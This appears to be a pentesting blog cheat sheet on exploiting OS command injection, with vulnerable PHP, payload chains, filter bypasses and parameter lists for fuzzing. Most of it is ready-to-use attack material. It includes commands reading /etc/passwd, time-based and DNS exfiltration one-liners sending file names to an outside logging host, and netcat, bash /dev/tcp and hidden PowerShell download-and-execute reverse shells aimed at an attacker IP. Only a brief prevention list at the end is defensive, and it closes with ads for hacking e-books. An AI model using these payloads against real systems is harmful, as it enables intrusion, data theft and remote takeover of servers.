Command Injection is a critical vulnerability that allows an attacker to execute arbitrary system commands on a server hosting an application. If an application improperly handles user input and passes it to the operating system, an attacker can escape the intended function and execute system commands with the same privileges as the application.

Depending on where your input is being injected you may need to terminate the quoted context (using " or ') before the commands.

None

πŸ› οΈ How Command Injection Works (Skip if You Know the Basics)

Applications that call system functions (e.g., shell commands) without sanitizing user input are vulnerable.

Example: Vulnerable Code (PHP)

<?php
  $user = $_GET['user']; 
  system("ping -c 4 " . $user); 
?>

πŸ’‘ Problem: The script appends user input to the system command without validation. πŸ’£ Attack: Inject ; cat /etc/passwd to execute extra commands!

http://target.com/ping.php?user=127.0.0.1;cat /etc/passwd

βœ… Result: The contents of /etc/passwd (Linux user accounts) are displayed.

πŸš€ Exploiting Command Injection: Practical Examples

πŸ“Œ Universal (Works on Unix & Windows)

ls||id; ls ||id; ls|| id; ls || id  # Execute both
ls|id; ls |id; ls| id; ls | id  # Pipe output between commands
ls&&id; ls &&id; ls&& id; ls && id  # Execute second command only if first succeeds
ls&id; ls &id; ls& id; ls & id  # Execute both but see output of second command
ls %0A id  # Newline execution (RECOMMENDED)

πŸ“Œ Unix-Specific Payloads

`ls`   # Executes command within backticks
$(ls)  # Executes command within $()
ls; id  # Chains commands with a semicolon
ls${LS_COLORS:10:1}${IFS}id  # Bypass certain filters

πŸ“Œ Windows-Specific Bypasses

powershell C:**2\n??e*d.*?   # Executes "notepad"
@^p^o^w^e^r^shell c:**32\c*?c.e?e  # Executes "calc"

πŸ”„ Bypassing Input Filters & Restrictions

Breaking Out of Quoted Context

Sometimes, input is wrapped inside double quotes (" ") or single quotes (' '). You need to escape them to inject commands.

πŸ”Ή If input is in double quotes (" ")

"test" && whoami

πŸ”Ή If input is in single quotes (' ')

'test' && whoami

πŸ”Ή If backslashes are filtered

\$\(whoami\)

Bypass Linux Restrictions

Bypassing Bash Restrictions - Rbash | VeryLazyTech

In many penetration testing scenarios, attackers encounter systems with restricted shell environments, such as…

verylazytech.com

πŸ” Finding Vulnerable Parameters

Many applications accept user input through query parameters. Here are the top 25 parameters that could be vulnerable to Command Injection or Remote Code Execution (RCE):

?cmd={payload}
?exec={payload}
?command={payload}
?execute={payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

πŸ›  Automate Testing for These Parameters:

wfuzz -c -z file,payloads.txt --hc 404 "http://target.com/page?input=FUZZ"
ffuf -u "http://target.com/page?input=FUZZ" -w payloads.txt

πŸ’£ Advanced Command Injection Techniques

⏳ Time-Based Data Exfiltration

Extracting data character by character:

time if [ $(whoami | cut -c 1) == s ]; then sleep 5; fi

⏱️ If response takes 5+ seconds, the first letter is 's'. Repeat to extract the full username.

πŸ“‘ DNS-Based Data Exfiltration

1️⃣ Use an Online DNS Logging Service (like dnsbin.zhack.ca) 2️⃣ Exfiltrate File Contents via DNS Requests

for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

πŸ“Œ This technique avoids detection because many firewalls allow outbound DNS traffic.

πŸ”₯ Exploiting Command Injection for Remote Shell Access

Linux Reverse Shell

Netcat Reverse Shell

1️⃣ Start a listener on your machine:

nc -lvnp 4444

2️⃣ Inject payload on the vulnerable target:

http://target.com/page?input=nc -e /bin/sh YOUR_IP 4444

Bash Reverse Shell

http://target.com/page?input=bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

Windows Reverse Shell

PowerShell Reverse Shell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_IP/shell.ps1')"

How to Prevent Command Injection

βœ… Use Parameterized Inputs β†’ Never concatenate user input into system commands. βœ… Sanitize Input Properly β†’ Use escapeshellcmd() and escapeshellarg() in PHP. βœ… Restrict System Commands β†’ Applications should not execute arbitrary OS commands. βœ… Use a Web Application Firewall (WAF) β†’ Detect and block malicious requests. βœ… Run Applications with Least Privileges β†’ Avoid running apps as root/admin.

πŸŽ‰ Join the VeryLazyTech community today and level up your skills! πŸŽ‰

Become VeryLazyTech member! 🎁

Follow us on:

Support us and buy me a coffee. β˜•

Visit our shop for e-books and courses. πŸ“š

πŸ”₯ Best Seller πŸ”₯ - Essential Collection: 20+ Hacking and Pentesting E-Books Bundle E

bark on a comprehensive learning journey with our Essential Collection: 20+ Hacking and Pentesting Books Bundle! This…bu

buymeacoffee.com